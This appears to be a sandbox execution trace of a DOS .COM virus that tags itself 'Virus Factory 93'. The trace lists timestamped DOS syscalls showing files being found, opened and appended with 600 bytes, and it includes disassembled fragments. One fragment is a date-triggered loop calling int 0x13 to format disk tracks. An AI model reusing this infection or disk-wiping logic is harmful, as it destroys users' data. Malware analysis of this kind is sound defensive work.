2018-12-25T12:54:09.903474134Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.913398425Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.916787097Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.92661317Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.933143422Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.939668857Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.940966889Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.950387622Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.95993392Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.962302057Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.971510633Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.978199066Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.984206438Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.985605363Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.993039167Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.004705581Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.006855097Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.008120316Z 59 PC: 12b03 | Change current directory
2018-12-25T12:54:10.009628527Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
0x12b0a: jne 0x12b2b
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
0x12b1f: call 0x12b64
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-25T12:54:10.014097738Z 9 PC: 12b2b | Display string (String= 'Big brother is watching you. Virus Factory 93 ')
2018-12-25T12:54:10.021350172Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.230879447Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.233623432Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.234411268Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.23508472Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.238928198Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.256116347Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.267833976Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.274560779Z 66 PC: 12bb4 | Move file pointer
2018-12-25T12:54:09.275768913Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-25T12:54:09.278302795Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.286430347Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.287648817Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.293862141Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.295311804Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.302912017Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.312932756Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.315598448Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.325244849Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.331541131Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.33763626Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.339629487Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.342401802Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.350406974Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.352174862Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.358309931Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.359707266Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.369728542Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.379354305Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.38182916Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.392206587Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.398814364Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.404941635Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.406329789Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.409073098Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.416679238Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.418002794Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.424260815Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.425734865Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.433585892Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.442989636Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.445400403Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.454965129Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.461385411Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.467579635Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.469554261Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.471740378Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.479521879Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.480869475Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.487893469Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.489296311Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.496932231Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.50688933Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.509356781Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.518755215Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.525568667Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.532265875Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.533662826Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.538120567Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.546188959Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.547885693Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.554909389Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.556256808Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.563778773Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.573833834Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.57644997Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.585792754Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.59290424Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.599615984Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.601133858Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.603700368Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.612305639Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.613726295Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.620827617Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.62240914Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.629669179Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.638325113Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.640752024Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.650052383Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.657347593Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.665230281Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.666893219Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.669726755Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.677912172Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.679182782Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.685779292Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.68722331Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.694709997Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.704548426Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.706911722Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.716368724Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.723412149Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.730029627Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.731518314Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.739465113Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.749041864Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.751326104Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:09.756230203Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:09.761957933Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.77402046Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.786228012Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.793179647Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.794682407Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.802836434Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.812911084Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.815901301Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.825966996Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.832323175Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.838426977Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.840201075Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.849682755Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.859557536Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.862648563Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.872022589Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.878854063Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.885375011Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.887056889Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.891717237Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.899690325Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.901719921Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.910194356Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.917848406Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.922152662Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.92352867Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.930816359Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.940472632Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.942979882Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.952606951Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.956810482Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.962812248Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.964683935Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.9734375Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.985518267Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.988496547Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.997892024Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.004123901Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.010634844Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.011966534Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.01866673Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.029158289Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.031632211Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.043884312Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.050643573Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.056797446Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.058159946Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.065867496Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.075636519Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.078123516Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.088362729Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.099234117Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.105747413Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.107448955Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.114517424Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.124017655Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.12647156Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.127958404Z 59 PC: 12b03 | Change current directory
2018-12-25T12:54:10.129613397Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
0x12b0a: jne 0x12b2b
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
0x12b1f: call 0x12b64
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-25T12:54:10.131694303Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.372036557Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.375851882Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.377685484Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.37897832Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.385774193Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.412274696Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.420122018Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.427884168Z 66 PC: 12bb4 | Move file pointer
2018-12-25T12:54:09.430688606Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-25T12:54:09.433247126Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.442478164Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.444505926Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.450444233Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.452457832Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.462274698Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.473519811Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.476903419Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.488829558Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.49638301Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.504107658Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.506098431Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.508941103Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.517971583Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.520075799Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.528095712Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.5298861Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.538932297Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.550839124Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.554455221Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.565934742Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.575231274Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.583220954Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.58518462Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.589056665Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.598442786Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.600556316Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.609201035Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.611467993Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.620558047Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.632279897Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.635627056Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.647296731Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.655428203Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.66304586Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.664660744Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.667121348Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.676612981Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.678156142Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.685390246Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.688460053Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.698469787Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.710226416Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.714484633Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.725886061Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.734124416Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.741942487Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.743821957Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.746336462Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.755524003Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.757980995Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.765420221Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.768035974Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.791896046Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.807100549Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.810164373Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.822148997Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.829813895Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.837431453Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.839643173Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.842464029Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.852811975Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.85487229Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.862764708Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.864776759Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.873801391Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.885988455Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.889466174Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.901148651Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.909624299Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.917390667Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.919280489Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.922504388Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.932012216Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.934087108Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.943646957Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.945837711Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.955014074Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.967758078Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.971504921Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.982859712Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.991907468Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.995624482Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.997831698Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.006044956Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.018416527Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.022441285Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:10.033301109Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:10.044705898Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.055849917Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.063657495Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.07245865Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.074858542Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.083099933Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.09545641Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.099127726Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.110905302Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.118712505Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.127270272Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.129351794Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.137676031Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.150340694Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.153723422Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.1737091Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.187503321Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.20470062Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.206757783Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.21588223Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.23208601Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.235371423Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.246801902Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.25570154Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.263404006Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.265472566Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.274731704Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.286586479Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.289828634Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.301749683Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.309927603Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.317361188Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.320174817Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.328762705Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.340005117Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.344030282Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.356270201Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.363774081Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.371016803Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.374022724Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.381990184Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.393542596Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.397970653Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.409707912Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.41758892Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.426123263Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.428201752Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.436441256Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.448614201Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.45222196Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.463361693Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.471921664Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.480703361Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.482390667Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.491183474Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.502986611Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.506117333Z 26 PC: 12af9 | Set disk transfer address
